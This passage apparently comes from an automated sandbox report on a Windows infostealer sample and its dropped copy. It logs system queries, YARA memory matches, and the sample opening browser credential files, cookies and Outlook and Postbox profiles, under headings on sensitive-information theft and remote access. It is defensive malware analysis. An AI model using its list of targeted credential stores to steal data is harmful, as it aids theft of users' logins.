                Source: C:\Users\user\Desktop\ckHregxJIq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeQueries volume information: C:\Users\user\Desktop\ckHregxJIq.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeQueries volume information: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeQueries volume information: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\ckHregxJIq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0000000E.00000002.3727115213.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.3728205346.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.ckHregxJIq.exe.41d5678.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.ckHregxJIq.exe.40c6e38.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.ckHregxJIq.exe.414e258.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ckHregxJIq.exe PID: 7868, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ckHregxJIq.exe PID: 5956, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: aFAsiNcQRJEVeL.exe PID: 1292, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: aFAsiNcQRJEVeL.exe PID: 5472, type: MEMORYSTR
                Source: Yara matchFile source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.ckHregxJIq.exe.41d5678.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.ckHregxJIq.exe.40c6e38.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.ckHregxJIq.exe.414e258.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ckHregxJIq.exe PID: 7868, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ckHregxJIq.exe PID: 5956, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: aFAsiNcQRJEVeL.exe PID: 1292, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\ckHregxJIq.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara matchFile source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.ckHregxJIq.exe.41d5678.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.ckHregxJIq.exe.40c6e38.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.ckHregxJIq.exe.414e258.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3723375088.000000000043D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ckHregxJIq.exe PID: 7868, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ckHregxJIq.exe PID: 5956, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: aFAsiNcQRJEVeL.exe PID: 1292, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: aFAsiNcQRJEVeL.exe PID: 5472, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0000000E.00000002.3727115213.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.3728205346.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack, type: UNPACKEDPE
